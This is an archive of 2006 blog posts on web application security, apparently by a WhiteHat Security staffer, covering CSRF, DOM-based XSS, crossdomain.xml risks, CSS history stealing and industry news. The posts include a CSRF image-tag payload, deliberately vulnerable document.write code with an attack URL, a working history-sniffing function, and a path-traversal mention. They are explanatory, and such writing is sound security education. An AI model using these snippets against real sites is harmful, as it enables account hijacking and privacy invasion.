Tuesday, October 31, 2006

Fire Hydrant Injection

Similar to Driving off with the fuel pump, this is another one of those things you hear about or see in the movies, but never with your own eyes. During a trip to Santa Cruz, CA, my wife and I happened to drive past an intersection where someone had just run over a fire hydrant. It was quite a sight. The tower of water was about 8 feet wide and reached 10 feet above the power lines! Water completely flooded the street. There was a school playground in the background and the kids were going nuts from behind the fence.

Tuesday, October 24, 2006

WhiteHat Sentinel 3.0

Warning: Shameless vendor self-promotion

WhiteHat has been working really hard on Sentinel 3.0 for over a year. Sentinel is the technology platform behind our managed service that continuously assesses the security of websites. We've released a number of cool new features, but for me the one that stands out is something we call "Inspector". Inspector is a way for us to capture the knowledge and experience from every assessment we perform. Think of it as a wisdom-of-the-crowds concept, but in our case the crowd is made up of web application security experts.

Much of the web application vulnerability assessment process is experience-driven. After performing even a few dozen assessments, a person develops a gut feel for how and where to locate vulnerabilities based upon previous experience. Experts who do this work for a living will know what I'm talking about. You see a certain situation and a sixth sense kicks in saying "there is something wrong here". If anyone else looked at that exact same thing, they might not think anything of it because they lack YOUR experience. Capturing this innate knowledge and sharing it between experts and technology has been a major hurdle. This is where Inspector comes in.

Inspector enables our security engineers to describe something interesting they've discovered to the Sentinel scanner that warrants further analysis (citing the reason). I'm not talking about new "checks". Inject some weird characters, then pattern match; that's soooo 2000. I'm talking abstract. Simple examples: anytime the scanner finds a ROT13/Base64/MD5/SHA1 version of your username/password in the HTML source or cookies, there's probably something worth looking at. If it sees a SQL "WHERE" in a URL, the application is likely passing literal SQL statements. Long text strings with spaces inside form parameters named error/err/mesg/msg often point to XSS or Content-Spoofing. There are thousands of these undocumented things that, cataloged over time, will make the system smarter.
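To make this concrete, here's a minimal sketch of what one such heuristic might look like (hypothetical JavaScript, not Sentinel's actual code): flag any response that contains a Base64-encoded copy of the test account's password.

function containsEncodedSecret(responseBody, password) {
  // Base64-encode the known credential and search the page for it.
  // A real heuristic would also try ROT13, MD5, SHA1, hex, etc.
  var encoded = btoa(password);
  return responseBody.indexOf(encoded) !== -1;
}

// Example: containsEncodedSecret(html, "s3cret") flags any page embedding "czNjcmV0".

Each hit isn't a vulnerability by itself; it's a pointer telling the engineer (or the scanner) where to dig next.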

Now multiply this by thousands upon thousands of assessments and you begin to understand how powerful a knowledge base this becomes. Can you tell I'm excited?

Monday, October 23, 2006

Place your bets on the first Firefox 2 vuln

On the heels of the Internet Explorer 7 release comes the much-anticipated Firefox 2.0, officially released tomorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. For IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF 2.0? I'll say 3 days; post your guess below.

Thursday, October 19, 2006

IE7 exploit in under 24 hours

That didn't take long. Someone was probably saving it, and it begins to confirm my earlier comments, 5 Tips to NOT Get Hacked Online, about Internet Explorer being an attractive target. The PoC IE6 and IE7 hack, as described by RSnake, means visiting a malicious web page could let it read data from any other website your browser can see. Hello web bank, hello web mail, hello intranet. The severity appears underrated since it's really easy to exploit and the exposure here is fairly high.

Supposedly this vulnerability was known in IE6 months ago and somehow made it into IE7. Odd. Personally, I think IE7 vulnerabilities are of limited overall risk while the user base remains small. Several months from now, when migration is in full swing, it'll be a different story. As security researchers and hardcore fraudsters become familiar with the product internals, the risk profile will change. The problem is that while IE7 is probably far more secure than its predecessor (fewer bugs = good), this does not necessarily mean less risk for users.

Wednesday, October 18, 2006

Looking for security work? Hiring?

RSnake opened up a job board on sla.ckers.org, a forum that got real popular real fast in its first two months of life. The board may turn out to be a valuable resource, especially for webappsec people, for finding work or a few candidates.

Monday, October 16, 2006

More on Netflix's CSRF advisory

Security researcher Dave Ferguson posted a Netflix CSRF advisory to a few mailing lists. A nice find, and responsibly disclosed. Included was the ability for an attacker to add movies to your rental queue, change the name and address on your account, etc. As RSnake said, "pretty scary", and a vulnerability I've called the sleeping giant. C-Net's Joris Evers covered the incident, Netflix fixes Web 2.0 bugs, and described the severity of the problem nicely. There are some parts of the story that require more context. I've met reporter Joris Evers, nice guy, but as sometimes happens, important technical aspects were left out.

“The problems were repaired before they became publicly known, Steve Swasey, a Netflix spokesman, said on Monday.”

It would be interesting to know how much time and effort it took to fix the issue.

“It is an extremely remote possibility that it would have affected any of Netflix's 5.2 million members,” Swasey said.

For the moment I'd agree the probability is low. The problem is it's hard to be sure. CSRF is really hard to spot in the logs since the attack looks like normal web server traffic. In fact, the logged-in user is the one sending the HTTP request, not the hacker. As the criminal element becomes increasingly familiar with CSRF, we can expect increased usage of the exploit.
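To illustrate why the logs look clean, a CSRF exploit can be as simple as an image tag on any page the victim happens to view (hypothetical URL and parameters shown):

<img src="http://www.example.com/account/update?email=attacker@evil.com" width="1" height="1">

The victim's browser dutifully sends the request, session cookie and all, and from the web server's perspective it is indistinguishable from the user clicking around the site themselves.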

"Design flaws in the Netflix Web site were the cause of the relatively new type of weakness in Web applications, …. said Dave Ferguson..."

If "relatively new" means 6-8 years or more, then OK.

"This type of attack is only suitable for a certain type of Web site. It just happens to be that Netflix is the perfect example," he said. One key thing is when the majority of users keep themselves logged in.”

Not so much. Nearly every website I've ever seen has CSRF vulnerabilities. The only difference between one website and another is the features present, which dictate the severity of an exploit. If a website doesn't do anything, CSRF is meaningless. If users can log in, change passwords, post comments, etc., then we're talking about something more damaging.

"Netflix is audited all the time for security," Swasey said. "There was some level of exposure, although not serious." At no point was customer data such as credit card numbers at risk, he stressed.”

With CSRF, credit card numbers are not necessarily the most important piece of data. Neither are usernames and passwords. When in control of a browser's authenticated access, a malicious attacker wouldn't need that data in order to transfer money out of a bank account, or in this case hijack a user's Netflix account.

"Cross Site Request Forgery, or XSRF, is seen as one of the security problems that affect feature-rich Web sites. These "Web 2.0" sites often offer an experience more like using a desktop application than like using the Web."

This part and the title of the story reference the ambiguous Web 2.0 moniker. The reality is CSRF affects all websites no matter what technology they use. AJAX, Flash, it's all the same in this respect. For the rest of us: if you think XSS is/was bad and clogs the mailing lists, just wait till the CSRF issues hit the security scene en masse.

P.S. I'm a Netflix customer; great service and it gets my best recommendation!

Web Application Security Professionals Survey

Two weeks ago I sent out an informal email survey to several dozen people I know in the web application security professional services business: people from large and small organizations who regularly perform penetration tests, vulnerability assessments, train others in secure software development, write articles and whitepapers, release tools, etc. In short, the "experts". The questions were intended to shed more light on the industry from those who live and breathe webappsec every day. Of the pool of 40, I received 21 responses, and the results are interesting. The data set is small, so be careful about reading too deeply into the results.

Thanks again to all those who took the time to fill out the survey. I got a lot of informative comments in addition to the answers. It would be insightful for readers to know the names/organizations of those polled, including what their comments were, but I promised not to release their personal information. However, they themselves are more than welcome to re-post their thoughts and comments.

1) How many web application security assessments will you perform in 2006?
a) None (0%)
b) 1 - 10 (0%)
c) 10 - 25 (57%)
d) 25 - 50 (29%)
e) 50+ (14%)

2) What vulnerability reporting standard do you utilize most often?
a) Web Security Threat Classification (WASC) (14%)
b) OWASP Top Ten (0%)
c) Common Vulnerabilities and Exposures (CVE) (10%)
d) Proprietary (57%)
e) Other (19%)


3) Do you use commercial web application vulnerability scanners during security assessments?
(SPI Dynamics' WebInspect, Cenzic's Hailstorm, Watchfire's AppScan, Acunetix Web Vulnerability Scanner)
a) Never (71%)
b) Sometimes (24%)
c) 50/50 (0%)
d) Most of the time (0%)
e) Religiously (5%)

4) Average number of man-hours required to perform a thorough web application vulnerability assessment on the average commerce website?
a) None (0%)
b) 0 - 10 (5%)
c) 10 - 25 (10%)
d) 25 - 40 (0%)
e) 40+ (86%)

5) Do you recommend Web Application Firewalls?

(ModSecurity, Imperva's SecureSphere, NetContinuum's NC-1100, Citrix Application Firewall, etc.)
a) Yes (14%)
b) No (10%)
c) Sometimes (76%)

6) What do you think about the updated PCI Data Security Standard v1.1?
a) Huh? (0%)
b) It's stupid and means nothing to me (0%)
c) Step in the right direction (57%)
d) Great for the web application security industry! (0%)
e) Other (43%)

7) Checking for XSS on public websites without permission?

a) Legal (24%)
b) Legal, but unethical (19%)
c) Illegal (10%)
d) Don't know (Grey area) (48%)

Wednesday, October 11, 2006

Making a secure web browser

A couple of browser security and vulnerability articles were posted today. "The False Promise of Browser Security" was a good read (yours truly quoted), but something from Computerworld got my attention: "What if I don't want IE7?". Isn't that the age-old question, I thought to myself. At the end the author says...

"I'm torn on this issue: IE7 is more secure than IE6 (how could it not be?) and I think the majority of home users do need to upgrade. But making it a mandatory upgrade as soon as it's publicly available strikes me as draconian and premature. I don't like having major upgrades to something as fundamental as my browser forced on me. Especially when I know IE7 is going to break things."

Forcing the update of "fundamental" software. That's an important point, since people will be unable to do the testing needed to make sure their day-to-day productivity won't be impacted. Let me stop there. I'll take a wild guess and say people are tired of listening to me bag on Internet Explorer. In fact, I'm tired of hearing myself talk about it. What I would like to talk about is the difficulty of building a web browser.

Consider what web browser developers have to put up with every day. The stupid, non-compliant things HTTP web servers do with the protocol. Having to support half a dozen client-side programming languages, with several variants each, all potentially harboring malicious code. Developers clamoring for standards compliance, then getting ticked off when you deliver it. The environment is completely hostile and browser vendors have to make the best of it. Billions in revenue depend on it.

Is it any wonder web browsers are a top target for malicious hackers?

Top 5 signs you've selected a bad web application package

As posted by Robert Auger (cgisecurity.com), a funny yet insightful list.

5. The vendor's idea of a patch process involves you editing line X and replacing it with new code
4. The amount of total downloads is less than the application's age
3. It isn't running on the vendor's homepage
2. The readme file states that you need to chmod a certain file or directory to 777 in order for it to work
1. If the application name contains 'nuke' in it, you're pretty much screwed.

Predictions of DOM-Based XSS

More than 10 years ago the industry became aware of smashing-the-stack buffer overflows. Many exploits later, these issues became harder to come by in popular software. The industry then moved on to heap overflows in pursuit of greener pastures. Once that grass was eaten up, the next evolutionary step occurred and integer overflows came to be identified more often. My prediction is that over the next 3-5 years, DOM-based Cross-Site Scripting (XSS) vulnerabilities, a class credited to Amit Klein, will follow a similar path.

Today the vast majority of XSS vulnerabilities fall into the persistent (HTML Injection) or non-persistent (link click) variety. I expect most of these issues to be cleaned up on major websites; in fact I see this trend already as people become aware of the dangers. From there it's reasonable to assume interest in DOM-based XSS will grow, where currently it lies in wait. For how long is the question.

DOM-based XSS has the spooky trait that the script injection does not traverse the network. Meaning, web applications and web application firewalls are unable to filter or block the attack. The vulnerability is actually buried inside the JavaScript code. We'll soon have to deeply educate ourselves on how best to spot these issues, both by hand and through automated means. At the moment we have to sift through seas of JavaScript code, ugh.
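A contrived example, in the spirit of Amit Klein's paper, shows why. Suppose a page greets visitors with client-side code like this (hypothetical page, vulnerable by design):

<script>
// Writes whatever follows "name=" in the URL directly into the page.
var pos = document.URL.indexOf("name=") + 5;
document.write(document.URL.substring(pos, document.URL.length));
</script>

Lure a victim to http://www.example.com/welcome.html#name=<script>...</script> and the payload executes in their browser. Because the injection rides in the fragment (everything after the #), it never appears in the HTTP request, the server logs, or anything a WAF could inspect.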

As for the next type of XSS, it has yet to be identified. ;)

Tuesday, October 10, 2006

Methodology for Comparing Web Application Vulnerability Assessment Solutions

Measuring the time difference for a web application security expert to hack a website before and after implementing a WAVA solution.

Priority one in web application security is ensuring websites do not get hacked. Everything we do security-wise should be designed to meet this goal. If vulnerabilities exist in websites we're responsible for, we need to find and fix them quickly, before ending up on the front page of Slashdot or the Wall Street Journal, on full-disclosure's or sla.ckers.org's wall-of-shame, or, much worse, getting a call from the FTC. Scanners, assessments, and managed services are the three options organizations have when shopping for solutions to identify web application vulnerabilities. The challenge we have in the industry is how to usefully compare Web Application Vulnerability Assessment (WAVA) solutions.

No website is 100% secure, at least not all the time, but there are ways to measure its security resilience and improvement over time. This capability can be used to compare the effectiveness of WAVA solutions, which improve security by identifying vulnerabilities so they can be resolved before being exploited. Using this data we can begin answering the question, "how hard does the WAVA solution make websites to hack?" As such, the more time, effort, and skill required to hack a website after implementing a given solution, the more effective it is. The premise is that it only takes a single vulnerability to compromise a website and defraud its users.

With feedback from the community I'm hoping to improve upon the methodology to make it useful for best practices, enterprise bake-offs, magazine reviews, analyst reports, consultants' advice, etc. Thanks to Richard Bejtlich (TaoSecurity), Robert Martin and Christy (MITRE), and RSnake for their assistance in vetting these ideas.

Definitions
o Hacker: A web application security expert with at least two years of experience identifying and exploiting vulnerabilities.
o Hack/Vulnerability: An exploitable web application vulnerability (WASC Threat Classification) of Level-3 severity or greater under the Payment Card Industry (PCI) Severity Rating Chart.
o Test Website: A website with at least 5 vulnerabilities.

Assumptions
o It only takes the use of a single vulnerability to compromise a website and defraud its users.
o If the website requires login, the hacker is provided at least one test account.
o Hacker may use any tools or information gathering resources at their disposal (scanners, proxies, browser, Google, etc.).

Procedure
(Repeat procedure for 6 hackers on 6 different test websites while alternating the WAVA solution for each website)

Step #1
Hacker attempts to find a vulnerability in the website. Measure the amount of time it took for identification. (T1)

Step #2
Run the WAVA solution to identify vulnerabilities.

Step #3
Note whether or not the solution identified the hacker-found vulnerability from Step #1. (V1)

Step #4
Resolve all identified vulnerabilities.

Step #5
Hacker attempts to find a vulnerability in the website. Measure the amount of time it took for identification. (T2)


Data Chart


Deliverables
o All raw data charts.
o Average years of experience for the hackers.
o Average T1 time.
o Percentage of time the WAVA solution identified V1.
o Average delta between T1 and T2 for each WAVA solution.
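
For example (hypothetical numbers): if hackers needed an average T1 of 3 hours to find their first exploitable vulnerability, and after remediation the average T2 rose to 20 hours, the 17-hour delta is the measured increase in attacker effort attributable to that WAVA solution. A competing solution yielding only a 5-hour delta is, by this methodology, less effective.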

Jeremiah thanks RSnake

While obnoxiously basking in my new Google glory, I failed to notice that RSnake wasn't on their security thank-you list. He's had a colorful relationship with Google in the past, and unfortunately not everyone gets the credit they deserve. I know this well, having been plagiarized more times than I care to remember. The fact is RSnake is a brilliant security guy and technologist. He's helped me on countless occasions with webapp hacks, including some with Google and others never to be named. Few are as passionate or contribute more to the infosec community than him.

The thing is, in this industry we're too often preoccupied with being overly critical of new ideas and paranoid of our peers. Possible does not necessarily mean probable, and we pay for that attitude. Every once in a while it's good to take the time to commend those whose work we've come to rely upon. RSnake deserves thanks for the XSS Cheat Sheet, the sla.ckers.org board, an informative blog, new ideas, and eclectic humor. Now get back to work, you prima donna!

NIST's XSS Hall of Shame

Notice: NIST.org (Network Information Security & Technology News), is not related to NIST.gov (National Institute of Standards and Technology)

Kevin Overcash (Breach Security) and RSnake's blog brought NIST.org's Cross-Site Scripting (XSS) Hall of Shame to my attention.

Kevin's words: "Following up on the XSS disclosure list on sla.ckers.org, the NIST.org has begun maintaining a list of commercial and government web sites that have been reported to be vulnerable to cross-site scripting attacks. ... It appears that NIST will maintain this site over time and provide organizations with the ability to remove themselves from the list when they demonstrate they are no longer vulnerable. NIST will verify the eradication of the vulnerability and remove sites that secure themselves. There are quite a few large organizations listed here. I believe that this is an important step in disclosure that may or may not have legal problems. For the moment, it serves as a significant wake up call to businesses. Everyone is vulnerable and the hackers know it."

When there's talk of legal issues regarding the discovery and disclosure of XSS vulnerabilities, I'm reminded of a funny line from the movie Kingpin.


mp3

Roy: "Is this legal, Mr. McCracken?"
Big Ern: "I don't know. It's fun though, isn't it!"



Monday, October 09, 2006

crossdomain.xml statistics

I've been reading Chris Shiflett's blog on the Dangers of Cross-Domain Ajax with Flash and crossdomain.xml insecurities. This area could potentially make Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) issues a lot worse. A lot depends on the circumstances, but it's time to learn a little bit more about this. For background...

As with JavaScript/AJAX, Flash Players are restricted from making asynchronous HTTP requests to off-domain URLs (the same-origin policy). For example, a Flash movie hosted on www.foo.com cannot place requests to www.bar.com. The policy prevents malicious Flash movies from compromising sensitive user data on other websites, but it also hinders development of cool new website mash-ups (without relying on a server-side proxy). This is where crossdomain.xml comes in: an XML policy file that gives Flash Players specific permission to access data from a given domain.

http://www.foo.com/crossdomain.xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.bar.com" />
<allow-access-from domain="*.foo.com" />
</cross-domain-policy>

<allow-access-from domain="www.bar.com" />
Says Flash movies on www.bar.com can make asynchronous HTTP requests to www.foo.com.

<allow-access-from domain="*.foo.com" />
Says Flash movies anywhere on foo.com can make asynchronous HTTP requests to www.foo.com.

<allow-access-from domain="*" />
Says Flash movies from anywhere can make asynchronous HTTP requests to www.foo.com. This looks particularly dangerous.

Here's what a Flash Player TechNote snippet says about it:
"This practice is suitable for public servers, but should not be used for sites located behind a firewall because it could permit access to protected areas. It should not be used for sites that require authentication in the form of passwords or cookies."

Fair enough, but who reads the docs anyway? Let's say you XSS somebody on www.hacker.com to load a malicious Flash movie. That movie would have full domain access to www.foo.com, provided the wildcard config was in place. My first reaction was: OK, while interesting, this is obscure technology, unlikely to be widely deployed, and as such of nominal risk to the enterprise. To make sure, I ran some tests on the websites of the Fortune 500 and the Alexa 100 (US). Here are the stats:

I was surprised at the results. About 8% of the Fortune 500 have crossdomain.xml policy files, and 2% of those are wildcarded for any domain. The Alexa 100 was even more pronounced: about 36% have crossdomain.xml, 6% of which are wildcarded for any domain. This says to me the risk is there and will likely grow.

Sunday, October 08, 2006

Thanked by Google Security


Google recently updated its Security and Product Safety page and in doing so took the time to thank several people, including me! Very cool. This page offers guidance on how to contact Google to disclose vulnerabilities and report hacking incidents. If you're a security researcher, this goes to show that responsible disclosure does work, especially when you're working with responsible companies.

BlackHat Japan 2006

BlackHat Japan 2006 was the 10th show I've been invited to attend. "Hacking Intranet Websites from the Outside" was an encore performance of the USA show. If you were in Vegas or downloaded the video, you didn't miss anything, unless of course you enjoy listening to speakers talk at half speed while being simultaneously translated U.N. style. That's an experience in and of itself. Just as in the U.S., web application security and Windows Vista were the main topics of interest.

The international BlackHats offer something unique compared to the U.S. shows. They tend to be smaller (maybe 200-400 people) and more intimate; you get to spend more quality time with the speakers and attendees and are able to sit in on more talks. All in all they are a lot of fun. This year I met people from all over, including New Zealand, Poland, Israel, Canada, Singapore, and of course the U.S. and Japan. BlackHat Japan easily wins the award for best-dressed show: 90% of the attendees were in black suits, white shirts, and ties. Only us speakers bucked the trend in our button-down garb.

I've been to Tokyo several times before and have always found it to be a fascinating city. The service is impeccable, the culture shock total, the Coke smooth (real sugar), the food amazing (Shabu Shabu!), and the technology a generation ahead of anything we have in the States. Akihabara rocks! Grifter described it best: at night some places feel like you're in Blade Runner. The only part that had my mind bent was the never-ending sea of anime everywhere, blech. I took a lot of pictures:



Another conference badge for the collection



Conference posters and Tom strikes a pose



I have no idea, somewhere off the Harajuku train stop.


When Sacha Faust is not being chased by Japanese women wearing short skirts and knee-high leather boots, he's drinking Sapporo and modeling cell phones.


Think 2600, with about 100x more content. Check out my new anti-virus charm too!


Check out the GQ'ed-up iSEC Partners hanging out before the Black Hat after-party. Oddly similar style of clothes to Tom Cruise in Collateral. Fortunately they didn't try to convert me to Scientology.


"Gee, Brain, what do you want to do tonight?" "The same thing we do every night, Pinky: Try to take over the world!" Jeff Moss and KS.


Instead of Dance USA


Rain and high winds took a toll on the umbrella population


Dan Moniz answering a question from Kanatoko of Jumperz.net


Like a kid in a candy store, Akihabara has all the gadgets you could ever want.


The attendees and the translation booth in the back of the room

Wednesday, October 04, 2006

Evolution of the Web Application Security World

Last week I attended a happy-hour party generously sponsored by iSEC Partners. About 40 people showed up from all over Silicon Valley, including Google, Siemens, IGN, eBay, Fortify, Adobe, etc. I met several thought-provoking people; many said they knew of me and enjoyed studying my work. Cool! Conversation revolved mainly around web application security, since that's what's on everyone's minds. We talked of new hacks, defense strategies, war stories, what the bad guys are up to, and of course plenty of vendor gossip. The amount of lucid webappsec discussion occurring in the physical world is, in a word, inspiring.

Then, just when I think I know something, someone says something that alters my view of the world. Two separate people said they learned about Cross-Site Scripting (XSS) in college! SQL Injection too. C'mon, you're joking, right!? I guess this makes sense, but I was completely blown away. When I first looked at institutions of higher learning, you were lucky to find one class on infosec, mostly about encryption, how firewalls worked, and the CIA model. Nothing webappsec related, let alone covering XSS. The underground had been playing around with what later became known as XSS since 1996. Not quite 30, I instantly felt like the old man of webappsec. Walking to school, uphill, both ways, in the snow. :)

For those who remember, the world was much different only a few years ago. Web application security was barely a term; in fact, most called it "CGI Security". Remember? Back in the time of phf, IIS Unicode, and ../../etc/passwd exploits. When everyone thought firewalls and the tiny lock symbol would safeguard us. Network security gurus shunned the few of us who knew better and ignored arguments to the contrary. And besides, how dangerous could a scripting language like JavaScript really be? HTTP monkeys weren't taken seriously, but this didn't stop us from walking in and out of just about any website we wanted. That part hasn't changed much.

What has changed is a vast improvement in widely disseminated knowledge and awareness amongst the masses. Web application security is no longer a dark art known only to a select few insiders. Industry conferences take place all over the world and webappsec speeches are commonplace. (In fact I'm en route to Black Hat Japan as I write this post.) Practitioners seeking technical training have only to ask. Novices, with no more skill than their web browser, can easily master powerful tricks of the trade. Organizations truly desiring security for their websites have what they need to protect themselves. While the industry still has a lot of work ahead, I see real progress.

I'll take some pictures of Tokyo while I'm here and post later.

big brother is watching and taking notes

Robert Auger from CGI Security spells out how a website could easily profile your interest in its competitors' websites, enabling it to market to you better. Based on the JS/CSS History Hack, Robert describes the following:

"Lets say VisitorA visits your site www.sitea.com. You can use the CSS history stealing trick to see if they have visited www.siteb.com and/or www.sitec.com. If they have also visited a competitor you'll know that this person is semi serious about whatever reason they are visiting your site for. Using the same CSS trick you could also enumerate a list of links (only enumerated if the link was visited) against each competitor website to see what they viewed on this site. This could include seeing which products/services they are interested in, if they visited the 'contact us' page and possibly if they also visited the 'thank you for submitting your data'."

This is a very probable scenario. In my tests, it's possible to check over 2,000 URLs in a few seconds without any noticeable browser performance issues. More than enough capacity for a website to conduct some decent profiling.
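
For those who haven't seen the hack in action, here's a minimal sketch of the getComputedStyle variant (hypothetical code; it assumes the page defines a style rule like a:visited { color: rgb(255, 0, 0); }):

function wasVisited(url) {
  // Probe browser history by styling a link and reading back its color.
  var link = document.createElement("a");
  link.href = url;
  document.body.appendChild(link);
  // Visited links pick up the a:visited color; unvisited links do not.
  var color = window.getComputedStyle(link, null).getPropertyValue("color");
  document.body.removeChild(link);
  return color == "rgb(255, 0, 0)";
}

// wasVisited("http://www.siteb.com/products/widget.html") tells www.sitea.com
// whether its visitor has been eyeing a competitor's widget page.

Loop that over a list of competitor URLs and you have Robert's profiler in a dozen lines.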

Robert asks..."This begs to ask the question is this legal?"

I think so, but I don't know for sure. Maybe this could be considered an improvement on referer checking. :) Though the more compelling question is: are people doing this already and we're just not noticing? Either way, it's time to protect yourself. Check out Stanford SafeHistory.

Tuesday, October 03, 2006

93,754,333 private records lost and counting

Thank you to Dennis Groves for passing this story along...

Data breaches near 94 million
"Less than two years into the great cultural awakening to the vulnerability of personal data, companies and institutions of every shape and size -- such as the data broker ChoicePoint, the credit card processor CardSystems Solutions, media companies such as Time Warner and dozens of colleges and universities across the land -- have collectively fumbled 93,754,333 private records. Or at least that's the rough figure tallied so far by the Privacy Rights Clearinghouse, a consumer advocacy organization in San Diego."

This number is simply astounding. I mean, there are only roughly 300 million Americans. Is this nearly 1 in 3? There is probably some overlap in the numbers, but wow. Businesses, consumers, security vendors, government, and watchdog groups all share part of the day-to-day responsibility for privacy protection. We have the technology, methodology, and best practices to make a real difference. We have everything we need except legislated responsibility. And that's the problem. Everyone's motivations are simply not in alignment. Without that, there's no way things can get better.

Maybe the situation will get so bad (with privacy, security, identity theft, terrorism, copyright, patents, corruption, global warming, gas prices, etc.) that we'll have no choice but to start doing the right thing. That's the safe bet; everything seems to work that way so far.




Monday, October 02, 2006

Just when you think it's over: ScanAlert drama

Brian Bertacini from AppSec Consulting clued me in to this story. This snippet kicks it off...

ID Thieves Turn Sights on Smaller E-Businesses
"After scanning the search results, he purchased the inexpensive item -- a USB cable used to synchronize the Treo's settings with his personal computer -- from Cellhut.com, the first online store displayed in the results that looked like it carried the cable. The site featured a "Hackersafe" logo indicating that the site's security had been verified within the past 24 hours. Later that day, information from Cole's purchase --- including his name, address, credit card and phone numbers, and the date and exact time of the transaction --- were posted into an online forum that caters to criminals engaged in credit card and identity theft."

ScanAlert Inc., a Napa, Calif.-based company, scans over 75,000 online merchants each day for thousands of known website flaws. According to the story, ScanAlert is investigating the breach. Of course, one would think law enforcement would be performing this task. We'll have to wait and see whether this was a web application hack or something else, but if you look at the published statistics, a web security attack is the smart bet.

"According to a report released this month by VISA, four-out-of-five of the top causes of card-related breaches were digital security weaknesses common at merchants large and small, including missing or outdated software security patches, misconfigured Web servers, and the use of vendor-supplied default passwords and settings, all of which are a violation of new payment card industry standards."

Several experts weighed in with their thoughts. Most were the normal best-practice stuff, but this one caused me to pause.

"Having one of these scanning services in place is definitely better than nothing because a lot of small and medium sized online stores don't have the staff in place to make sure their applications are secure," said Jason Lam, who teaches a course on securing Web sites for the SANS Institute.

Normally I would agree that doing something is better than nothing. This might be a different situation. If a scanning vendor tells you they scan for vulnerabilities which they are clearly not finding, then all you've bought is a false sense of security. The bad guys will quickly figure out that any business carrying the logo probably has vulnerabilities anyway, whatever the reports say!

My question is: since ScanAlert is a certified PCI scanning vendor, what does this say about enforcement of the PCI standard? I've talked about this problem in the process before. And what does this say about the rest of ScanAlert's 75,000 customers? Maybe it's just as the logo suggests: "safe for hackers".